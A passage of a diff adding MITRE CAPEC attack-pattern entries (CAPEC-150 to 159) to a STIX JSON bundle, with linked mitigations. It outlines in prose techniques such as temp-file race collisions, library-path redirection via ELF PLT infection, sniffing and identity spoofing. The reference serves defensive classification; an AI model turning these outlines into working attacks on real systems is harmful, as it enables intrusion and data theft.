[ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "target_ref": 
"attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use type conversions such as JDBC prepared statements.", + "id": "course-of-action--d27b9ab5-05c1-40d5-9fc3-cbcd2c723a00", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-15-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--18b1ee44-40f2-43f7-97d1-56bde0108bbd", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d27b9ab5-05c1-40d5-9fc3-cbcd2c723a00", + "target_ref": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits well-known locations for resources for the purposes of undermining the security of the target. In many, if not most systems, files and resources are organized in a default tree structure. This can be useful for adversaries because they often know where to look for resources or files that are necessary for attacks. Even when the precise location of a targeted resource may not be known, naming conventions may indicate a small area of the target machine's file tree where the resources are typically located. For example, configuration files are normally stored in the /etc director on Unix systems. 
Adversaries can take advantage of this to commit other types of attacks.", + "external_references": [ + { + "external_id": "CAPEC-150", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/150.html" + }, + { + "external_id": "CWE-552", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/552.html" + }, + { + "external_id": "CWE-1239", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1239.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "external_id": "CWE-1323", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1323.html" + }, + { + "external_id": "CWE-1330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1330.html" + }, + { + "description": "OS Credential Dumping", + "external_id": "T1003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1003" + }, + { + "description": "Automated Collection", + "external_id": "T1119", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1119" + }, + { + "description": "Data from Information Repositories", + "external_id": "T1213", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1213" + }, + { + "description": "Data from Cloud Storage Object", + "external_id": "T1530", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1530" + }, + { + "description": "Credentials from Password Stores", + "external_id": "T1555", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1555" + }, + { + "description": "Data from Configuration Repository", + "external_id": "T1602", + 
"source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1602" + } + ], + "id": "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Collect Data from Common Resource Locations", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "An adversary can use a technique called Bluesnarfing to retrieve data from Bluetooth enabled devices in which they know where the data is located. This is done by connecting to the device’s Object Exchange (OBEX) Push Profile and making OBEX GET requests for known filenames (contact lists, photos, recent calls). Bluesnarfing was patched shortly after its discovery in 2003 and will only work on devices created before or during this time." + ], + "x_capec_parent_of_refs": [ + "attack-pattern--a20a3cc9-4a6a-4376-a2b4-777ee9df2a34", + "attack-pattern--af65cbd9-cc10-4c4f-9cc3-843941cdf357", + "attack-pattern--7fea6e82-183a-4811-9b71-1ebe4d6c8b11", + "attack-pattern--756a1a93-3734-426c-9e91-f9339de74a7a", + "attack-pattern--60ceb889-a284-44bb-ae05-4b7e347e1597", + "attack-pattern--ad242ccf-3578-4787-937c-22eb0ede3fb6", + "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7" + ], + "x_capec_prerequisites": [ + "The targeted applications must either expect files to be located at a specific location or, if the location of the files can be configured by the user, the user either failed to move the files from the default location or placed them in a conventional location for files of the given type." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. 
In some cases, the attacker need not even have direct access to the locations on the target computer where the targeted resources reside." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials.", + "external_references": [ + { + "external_id": "CAPEC-151", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/151.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + } + ], + "id": "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Identity Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + 
"attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f", + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "attack-pattern--cd6af290-f89e-4238-95b3-6f06d05ed814", + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Communications", + "Software", + "Hardware" + ], + "x_capec_extended_description": "\n Alternatively, an adversary may intercept a message from a legitimate sender and attempt to make it look like the message comes from them without changing its content. The latter form of this attack can be used to hijack credentials from legitimate users. Identity Spoofing attacks need not be limited to transmitted messages - any resource that is associated with an identity (for example, a file with a signature) can be the target of an attack where the adversary attempts to change the apparent identity. This attack differs from Content Spoofing attacks where the adversary does not wish to change the apparent identity of the message but instead wishes to change what the message says. 
In an Identity Spoofing attack, the adversary is attempting to change the identity of the content.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5", + "attack-pattern--8711eca6-b3ad-40b7-b7ac-08be37885119", + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9", + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285", + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_prerequisites": [ + "The identity associated with the message or resource must be removable or modifiable in an undetectable way." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ robust authentication processes (e.g., multi-factor authentication).", + "id": "course-of-action--a4ee4981-07bd-4a5d-bc5b-3159e9005c04", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-151-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4e224ed0-2d80-495f-925d-d726a7fe4f81", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4ee4981-07bd-4a5d-bc5b-3159e9005c04", + "target_ref": "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits a weakness in input validation by controlling the format, structure, and composition of data to an input-processing interface. By supplying input of a non-standard or unexpected form an attacker can adversely impact the security of the target.", + "external_references": [ + { + "external_id": "CAPEC-153", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/153.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + } + ], + "id": "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Input Data Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, using a different character encoding might cause dangerous text to be treated as safe text. Alternatively, the attacker may use certain flags, such as file extensions, to make a target application believe that provided data should be handled using a certain interpreter when the data is not actually of the appropriate type. This can lead to bypassing protection mechanisms, forcing the target to use specific components for input processing, or otherwise causing the user's data to be handled differently than might otherwise be expected. 
This attack differs from Variable Manipulation in that Variable Manipulation attempts to subvert the target's processing through the value of the input while Input Data Manipulation seeks to control how the input is processed.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "attack-pattern--1f3b920a-a706-494c-9486-69531a514912", + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_prerequisites": [ + "The target must accept user data for processing and the manner in which this data is processed must depend on some aspect of the format or flags that the attacker can control." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary deceives an application or user and convinces them to request a resource from an unintended location. 
By spoofing the location, the adversary can cause an alternate resource to be used, often one that the adversary controls and can be used to help them achieve their malicious goals.", + "external_references": [ + { + "external_id": "CAPEC-154", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/154.html" + }, + { + "external_id": "CWE-451", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/451.html" + } + ], + "id": "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Resource Location Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Communications", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_prerequisites": [ + "None. All applications rely on file paths and therefore, in theory, they or their resources could be affected by this type of attack." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor network activity to detect any anomalous or unauthorized communication exchanges.", + "id": "course-of-action--eeb4d011-944b-4c48-9b7e-9cea2b3c86df", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-154-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ef1a3b66-cfc8-4c92-9df9-237b586b11f2", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eeb4d011-944b-4c48-9b7e-9cea2b3c86df", + "target_ref": "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits the temporary, insecure storage of information by monitoring the content of files used to store temp data during an application's routine execution flow. Many applications use temporary files to accelerate processing or to provide records of state across multiple executions of the application. Sometimes, however, these temporary files may end up storing sensitive information. By screening an application's temporary files, an adversary might be able to discover such sensitive information. For example, web browsers often cache content to accelerate subsequent lookups. 
If the content contains sensitive information then the adversary could recover this from the web cache.", + "external_references": [ + { + "external_id": "CAPEC-155", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/155.html" + }, + { + "external_id": "CWE-377", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/377.html" + } + ], + "id": "attack-pattern--7fea6e82-183a-4811-9b71-1ebe4d6c8b11", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Screen Temporary Files for Sensitive Information", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--bddd2549-167f-4f7b-8d0f-6d1e647b26f6" + ], + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Look for temporary files in target application: An adversary will try to discover temporary files in a target application. Knowledge of where the temporary files are being stored is important information.

Experiment

  1. Attempt to read temporary files: An adversary will attempt to read any temporary files they may have discovered through normal means.

  2. Techniques
    Attempt to get the file by querying the file path to a web server
    Using a remote shell into an application, read temporary files and send out information remotely if necessary
    Recover temporary information from a user's browser cache

Exploit

  1. Use function weaknesses to gain access to temporary files: If normal means to read temporary files did not work, an adversary will attempt to exploit weak temporary file functions to gain access to temporary files.

  2. Techniques
    Some C functions such as tmpnam(), tempnam(), and mktemp() will create a temporary file with a unique name, but do not stop an adversary from creating a file of the same name before it is opened by the application. Because these functions do not create file names that are sufficiently random, an adversary will try to make a file of the same name, causing a collision, and possibly altering file permissions for the temporary file so that it is able to be read.
    Similar to the last technique, an adversary might also create a file name collision using a linked file in a unix system such that the temporary file contents written out by the application write to a file of the adversaries choosing, allowing them to read the file contents.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target application must utilize temporary files and must fail to adequately secure them against other parties reading them." + ], + "x_capec_resources_required": [ + "Because some application may have a large number of temporary files and/or these temporary files may be very large, an adversary may need tools that help them quickly search these files for sensitive information. If the adversary can simply copy the files to another location and if the speed of the search is not important, the adversary can still perform the attack without any special resources." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, the adversary intercepts information transmitted between two third parties. The adversary must be able to observe, read, and/or hear the communication traffic, but not necessarily block the communication or change its content. Any transmission medium can theoretically be sniffed if the adversary can examine the contents between the sender and recipient. Sniffing Attacks are similar to Adversary-In-The-Middle attacks (CAPEC-94), but are entirely passive. 
AiTM attacks are predominantly active and often alter the content of the communications themselves.", + "external_references": [ + { + "external_id": "CAPEC-157", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/157.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + } + ], + "id": "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Sniffing Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c" + ], + "x_capec_child_of_refs": [ + "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Communication Mechanism: The adversary determines the nature and mechanism of communication between two components, looking for opportunities to exploit.

  2. Techniques
    Look for application documentation that might describe a communication mechanism used by a target.

Experiment

  1. Position In Between Targets: The adversary positions themselves somewhere in the middle of the two components. If the communication is encrypted, the adversary will need to act as a proxy and route traffic between the components, exploiting a flaw in the encryption mechanism. Otherwise, the adversary can just observe the communication at either end.

  2. Techniques
    Use Wireshark or some other packet capturing tool to capture traffic on a network.
    Install spyware on a client that will intercept outgoing packets and route them to their destination as well as route incoming packets back to the client.
    Exploit a weakness in an encrypted communication mechanism to gain access to traffic. Look for outdated mechanisms such as SSL.

Exploit

  1. Listen to Communication: The adversary observes communication, but does not alter or block it. The adversary gains access to sensitive information and can potentially utilize this information in a malicious way.

", + "x_capec_parent_of_refs": [ + "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "attack-pattern--cddb7bce-8d94-4eea-8e73-9f6ef66376c2", + "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "attack-pattern--c7f0c73b-fe94-49c9-89bb-a3ec4441e4ee", + "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4" + ], + "x_capec_prerequisites": [ + "The target data stream must be transmitted on a medium to which the adversary has access." + ], + "x_capec_resources_required": [ + "The adversary must be able to intercept the transmissions containing the data of interest. Depending on the medium of transmission and the path the data takes between the sender and recipient, the adversary may require special equipment and/or require that this equipment be placed in specific locations (e.g., a network sniffing tool)" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Encrypt sensitive information when transmitted on insecure mediums to prevent interception.", + "id": "course-of-action--8e8679ec-95e4-4391-abb4-9a40406a3476", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-157-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ec5d6642-3556-4d29-8f30-07ab3be9ab1a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e8679ec-95e4-4391-abb4-9a40406a3476", + "target_ref": "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec", + "type": "relationship", + "x_capec_version": "3.9" + }, 
+ { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, the adversary monitors network traffic between nodes of a public or multicast network in an attempt to capture sensitive information at the protocol level. Network sniffing applications can reveal TCP/IP, DNS, Ethernet, and other low-level network communication information. The adversary takes a passive role in this attack pattern and simply observes and analyzes the traffic. The adversary may precipitate or indirectly influence the content of the observed transaction, but is never the intended recipient of the target information.", + "external_references": [ + { + "external_id": "CAPEC-158", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/158.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Network Sniffing", + "external_id": "T1040", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1040" + }, + { + "description": "Multi-Factor Authentication Interception", + "external_id": "T1111", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1111" + } + ], + "id": "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Sniffing Network Traffic", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--67cf8bc2-3d17-4ecf-b52e-febdb7804a37" + ], + "x_capec_child_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "The target must be communicating on a 
network protocol visible by a network sniffing application.", + "The adversary must obtain a logical position on the network from intercepting target network traffic is possible. Depending on the network topology, traffic sniffing may be simple or challenging. If both the target sender and target recipient are members of a single subnet, the adversary must also be on that subnet in order to see their traffic communication." + ], + "x_capec_resources_required": [ + "A tool with the capability of presenting network communication traffic (e.g., Wireshark, tcpdump, Cain and Abel, etc.)." + ], + "x_capec_skills_required": { + "Low": "Adversaries can obtain and set up open-source network sniffing tools easily." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Obfuscate network traffic through encryption to prevent its readability by network sniffers.", + "id": "course-of-action--26edfe3d-53cd-4d09-abbf-84ee7c48236f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-158-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--28658fd8-29a0-4a6b-b8a9-d7a967352c4e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--26edfe3d-53cd-4d09-abbf-84ee7c48236f", + "target_ref": "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ appropriate levels of segmentation to your network in accordance with best practices.", + "id": "course-of-action--3ca8bdc8-6a37-4294-acfe-2e658e9e0fe6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-158-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d1c000a2-67f9-4572-af06-6707542d5784", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3ca8bdc8-6a37-4294-acfe-2e658e9e0fe6", + "target_ref": "attack-pattern--897a5506-45bb-4f6f-96e7-55f4c0b9021a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in the way an application searches for external libraries to manipulate the execution flow to point to an adversary supplied library or code base. This pattern of attack allows the adversary to compromise the application or server via the execution of unauthorized code. An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. If an adversary can redirect an application's attempts to access these libraries to other libraries that the adversary supplies, the adversary will be able to force the targeted application to execute arbitrary code. This is especially dangerous if the targeted application has enhanced privileges. 
Access can be redirected through a number of techniques, including the use of symbolic links, search path modification, and relative path manipulation.", + "external_references": [ + { + "external_id": "CAPEC-159", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/159.html" + }, + { + "external_id": "CWE-706", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/706.html" + }, + { + "description": "Hijack Execution Flow:Path Interception by Search Order Hijacking", + "external_id": "T1574.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/008" + }, + { + "description": "Silvio Cesare, Share Library Call Redirection Via ELF PLT Infection (Issue 56), Phrack Magazine, 2000", + "external_id": "REF-29", + "source_name": "reference_from_CAPEC", + "url": "http://phrack.org/issues/56/7.html" + }, + { + "description": "OWASP Top 10 2007 (2007), The Open Web Application Security Project (OWASP)", + "external_id": "REF-30", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/www-pdf-archive/OWASP_Top_10_2007.pdf" + } + ], + "id": "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Redirect Access to Libraries", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "In this example, the attacker using ELF infection that redirects the Procedure Linkage Table 
(PLT) of an executable allowing redirection to be resident outside of the infected executable. The algorithm at the entry point code is as follows... • mark the text segment writeable • save the PLT(GOT) entry • replace the PLT(GOT) entry with the address of the new lib call The algorithm in the new library call is as follows... • do the payload of the new lib call • restore the original PLT(GOT) entry • call the lib call • save the PLT(GOT) entry again (if its changed) • replace the PLT(GOT) entry with the address of the new lib call" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify Target: The adversary identifies the target application and determines what libraries are being used.

  2. Techniques
    Find public source code and identify library dependencies.
    Gain access to the system hosting the application and look for libraries in common locations.

Experiment

